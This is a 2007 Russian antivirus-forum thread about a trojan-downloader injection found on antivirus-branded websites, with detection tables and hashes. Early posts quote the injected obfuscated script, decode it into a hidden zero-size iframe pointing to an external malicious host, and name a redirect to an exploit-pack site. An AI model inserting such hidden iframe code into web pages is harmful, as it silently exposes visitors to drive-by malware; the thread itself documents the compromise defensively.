Перейти к содержанию
Сергей Ильин

www.symantec-antivirus.ru заражен троянской программой

Recommended Posts

Сергей Ильин

Касперский при посещении сайта www.symantec-antivirus.ru ругается на троянскую программу Trojan-Downloader.HTML.Agent.fy

Поломали сайт?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Ego1st

нет symantec сами ставят для контроля за клиентами=))

!-- ~ --><SCRIPT Language="JavaScript">document.write(unescape("%3C%69%66%72%61%6D%65 %73%72%63%3D%22%68%74%74%70%3A%2F%2F%33%30%33%69%6E%63%2E%70%72%69%2E%65%65%2F%78%64%73%2F%69%66%72%61%6D%65%2E%70%68%70%22 %66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22 %77%69%64%74%68%3D%30 %68%65%69%67%68%74%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E%0A"));</SCRIPT><!-- ~ -->

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
A.

перевод

<iframe src="http://303inc.pri.ee/xds/iframe.php" frameborder="0" width=0 height=0></iframe>

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
vaber

Угу, сайт поломан.

Размещен зашифрованный iframe - 303inc.pri.ee/xds/iframe.php (<script language="JavaScript"> window.location.href ="http://www.porno4sms.ru/dima/" </script>)

Там пакет сплоитов, загружающих трояна-загрузчика (porno4sms.ru/dima/****.php).

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Сергей Ильин

Заражен также и еще один сайт

http://www.kaspersky-antivirus.ru/

Этот сайт принадлежит компании "Ампула"

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
A.

ну и как - кроме KAV кто-нибудь еще ловит ? :)))

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
vaber
Заражен также и еще один сайт

http://www.kaspersky-antivirus.ru/

Этот сайт принадлежит компании "Ампула"

Не вижу, наверное по чистили.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
alexgr

симантек у меня на 404 :(

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
vaber
ну и как - кроме KAV кто-нибудь еще ловит ? :)))

:P

Антивирус      Версия      Обновление      РезультатAhnLab-V3    2007.10.2.1    2007.10.02    -AntiVir    7.6.0.18    2007.10.02    Worm/Ntech.MAuthentium    4.93.8    2007.10.02    -Avast    4.7.1043.0    2007.10.02    -AVG    7.5.0.488    2007.10.02    -BitDefender    7.2    2007.10.02    -CAT-QuickHeal    9.00    2007.10.02    -ClamAV    0.91.2    2007.10.02    -DrWeb    4.44.0.09170    2007.10.02    -eSafe    7.0.15.0    2007.10.01    -eTrust-Vet    31.2.5179    2007.10.02    -Ewido    4.0    2007.10.02    -FileAdvisor    1    2007.10.02    -Fortinet    3.11.0.0    2007.10.02    -F-Prot    4.3.2.48    2007.10.01    -F-Secure    6.70.13030.0    2007.10.02    Trojan.Win32.Pakes.dmIkarus    T3.1.1.12    2007.10.02    -Kaspersky    7.0.0.125    2007.10.02    Trojan.Win32.Pakes.dmMcAfee    5131    2007.10.01    -Microsoft    1.2803    2007.10.02    -NOD32v2    2565    2007.10.02    -Norman    5.80.02    2007.10.01    -Panda    9.0.0.4    2007.10.02    -Prevx1    V2    2007.10.02    -Rising    19.43.10.00    2007.10.02    -Sophos    4.22.0    2007.10.02    Troj/Pushdo-GenSunbelt    2.2.907.0    2007.10.02    -Symantec    10    2007.10.02    -TheHacker    6.2.6.075    2007.10.01    -VBA32    3.12.2.4    2007.10.02    -VirusBuster    4.3.26:9    2007.10.01    -Webwasher-Gateway    6.0.1    2007.10.02    Worm.Ntech.MДополнительная информацияFile size: 20992 bytesMD5: b4b2a577d4c1c46d532a5e40e2246c7cSHA1: 61e06b636f5b9e883b43198f8f953803b170c282

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
K_Mikhail
ну и как - кроме KAV кто-нибудь еще ловит ? :)))

:P

Trojan.DownLoader.34753

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
A.
ну и как - кроме KAV кто-нибудь еще ловит ? :)))

:P

Trojan.DownLoader.34753

очень смешно :)

20 минут назад добавили ? :)

а, сам нашел:

New record has been added Trojan.DownLoader.34753 Roman Vasilenko 12:37

--

текущее время на сайте -Tue Oct 2 13:04:08 2007 GMT

:)

FYI:

Trojan-Downloader.HTML.Agent.fy - добавлен 27 сентября

Trojan.Win32.Pakes.dm - 29 сентября

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
vaber

Замечу, что троян, загружаемый этим эксплоитом - модификация одного из многочисленных троян-даунлодеров. Одна из его модификаций использовалась в тесте на лечение активного заражения(непосредственно загружаемая часть) - см. Trojan-Downloader.Win32.Agent.brk. И вылечить систему от этого спамбота смог только один антивирус - победитель теста.

Детект с вирустотал подгружаемой части (собственно сам спамбот):

Антивирус      Версия      Обновление      РезультатAhnLab-V3    2007.10.2.1    2007.10.02    Win-Trojan/Agent.40448.BZAntiVir    7.6.0.18    2007.10.02    HEUR/MalwareAuthentium    4.93.8    2007.10.02    W32/Trojan.AWMIAvast    4.7.1043.0    2007.10.02    Win32:Small-EPJAVG    7.5.0.488    2007.10.02    BackDoor.Generic7.XXDBitDefender    7.2    2007.10.02    Rootkit.Agent.GVCAT-QuickHeal    9.00    2007.10.02    Rootkit.Agent.eyClamAV    0.91.2    2007.10.02    Trojan.Agent-6946DrWeb    4.44.0.09170    2007.10.02    BackDoor.BulkneteSafe    7.0.15.0    2007.10.01    -eTrust-Vet    31.2.5179    2007.10.02    Win32/Cutwail!genericEwido    4.0    2007.10.02    Rootkit.Agent.eyFileAdvisor    1    2007.10.02    -Fortinet    3.11.0.0    2007.10.02    -F-Prot    4.3.2.48    2007.10.01    W32/Trojan.AWMIF-Secure    6.70.13030.0    2007.10.02    Rootkit.Win32.Agent.eyIkarus    T3.1.1.12    2007.10.02    Rootkit.Win32.Agent.eyKaspersky    7.0.0.125    2007.10.02    Rootkit.Win32.Agent.eyMcAfee    5131    2007.10.01    Spy-Agent.bvMicrosoft    1.2803    2007.10.02    TrojanDropper:Win32/Cutwail.CNOD32v2    2565    2007.10.02    Win32/Wigon.ZNorman    5.80.02    2007.10.01    W32/Rootkit.ARHPanda    9.0.0.4    2007.10.02    -Prevx1    V2    2007.10.02    Malware.GenRising    19.43.10.00    2007.10.02    RootKit.Win32.Agent.sqSophos    4.22.0    2007.10.02    Troj/DropRk-ASunbelt    2.2.907.0    2007.10.02    -Symantec    10    2007.10.02    Trojan.PandexTheHacker    6.2.6.075    2007.10.01    -VBA32    3.12.2.4    2007.10.02    BackDoor.BulknetVirusBuster    4.3.26:9    2007.10.01    Rootkit.Posh.AWebwasher-Gateway    6.0.1    2007.10.02    Heuristic.MalwareДополнительная информацияFile size: 41472 bytesMD5: 1dd7402ca312184017c6a44d132b0b3cSHA1: 8aad66172aae6a1b2a73a1732534d649ff7d84fc

Как видно ее вирусописатели особо не модифицируют :)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
STALK:ER
Касперский при посещении сайта www.symantec-antivirus.ru ругается на троянскую программу Trojan-Downloader.HTML.Agent.fy

Поломали сайт?

Всё ещё заражён... Dr. Web 4.44 Поймал -> Trojan.DownLoader.33840

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
TANUKI

Зашел через Фаерфокс с включенным NoScript и Авирой Премиум - ничего не нашел ни на симантеке ни на касперсокм. Отключил NoScript - все равно пусто. :( Зашел и с выключенной Авирой, все равно пусто :( Полечили сайты уже или я уже заразился? :)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
STALK:ER
Зашел через Фаерфокс с включенным NoScript и Авирой Премиум - ничего не нашел ни на симантеке ни на касперсокм. Отключил NoScript - все равно пусто. :( Зашел и с выключенной Авирой, все равно пусто :( Полечили сайты уже или я уже заразился? :)

Зашёл после твоего сабжа..... поздравляю ты избранный... (читать заражён...)

касперский чист, а симантек заражён....

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Сергей Ильин

Первый не доступен сейчас, ошибка 404, а второй - полечили.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
aibolit66
очень смешно :)

20 минут назад добавили ? :)

Видимо все в отпусках. Перетрудились из-за по поддержки Windows Vista :)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
TANUKI

Первый доступен, если не делать редирект с этого форума, а тупо ссылку вбивать :) Может кто-то проверит еще разок? :)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Сергей Ильин

Антивирус Касперского 6.0

The requested URL http://www.symantec-antivirus.ru/ is forbidden

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Николай Головко

Сергей, грех не обновлять используемое защитное ПО. :)

А сайт уже чист: вредоносного кода не вижу. Единственный скрипт - счетчик LiveInternet.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Lex

у ампулы все сайты на одном движке. Небось и остальные заражены. Типа dr-web.ru, nod-32.ru и иже с ними, их таких с десяток, а не только симантек с каспером. Идти проверять самому что-то желания не возникло :)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
TANUKI

Сергей Ильин

Снес Авиру, поставил Каспера 7. При редиректе с сайта таки высвечивает, что сайт "форбидн", а на другие сайты компании пускает. При ридеректе уже с сайта, например drweb-antivirus.ru пускает и на symantec, но заразы ни на одном из сайтов не находит :)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
MiStr

Это сообщение Родительского контроля. Либо отключите его, либо внесите сайт в "белый" список.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Lex

интересно, чем антивирусный сайт не угодил родительскому контролю?..

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Иван

симантек это отъявленная порнография :lol:

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Создайте учетную запись или войдите, чтобы комментировать

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти

  • Сообщения

    • santy
      согласен, не пользуюсь этим, (удалить только файл, из контекста на полном имени файла) потому наверное и забыл уже. использую только удаление файлов или объектов в контексте Инфо. те, что никак не вписываются в автоскрипт. тогда придется все контекстное меню переносить. например, кто-то захочет проверку на VT/VScan выполнить из Инфо, запретить запуск файла, добавить сигнатуру... и т.д. потому что если удалить сразу файл, то потом уже никак это не сделать.  
    • alamor
      Наугад потыкал на разных файлах, строка в Инфо удалить только сам файл была на всех начиная от системных файлов и заканчивая рассширением браузеров. Так что ваш вывод похоже ошибочен. А прочитать о чём изначально речь не пробовали? Речь как раз про то что это неудобно. Если ещё на одном файле посмотреть ладно, а если хотя бы пять или больше, то уже начинает надоедать туда сюда скакать и ещё после того как вернёшься из Инфо надо смотреть, чтобы случайно на другой строке не кликнуть. Так что наверно оптимальный вариант был бы: 1) Добавить туда по ПКМ список этих команд для тех, кто привык вставлять команды мышкой (вместо того чтобы вернуться в основной список и там ПКМ отдать команду сразу можно будет отдать её из этого окна). 2) Добавить в этом окне поддержку стандартных горячих клавиш удаления и карантина, для тех кто привык вставлять команды горячими клавишами.
    • santy
    • santy
      можно, но только через контекстное меню.  а это все то же дополнительное нажатие ПКМ + еще и стрелку вниз/вверх для выбора элемента меню+ click, так что не факт что это будет проще и быстрее. вообщем рационализация спорная, имхо. можно после просмотра Инфо вернуться в список и использовать уже настроенное меню всевозможных удалений.  
    • PR55.RP55
      Дело то не в этом. Дело в наличие команды:  " Удалить только сам файл" в меню Инфо. значит отдавать команды через меню Инфо. можно. ( Для системных файлов так ,или иначе уже реализована защита ссылок от удаления. ) Вернёмся к теме: " alamor пишет: неудобно, что посмотришь подробную инфу о файле по дабл-клику - примешь решение удалять его. И нельзя сразу из того же окна удалить его (или ссылки на него). Надо выходить из того окна и так. "  
×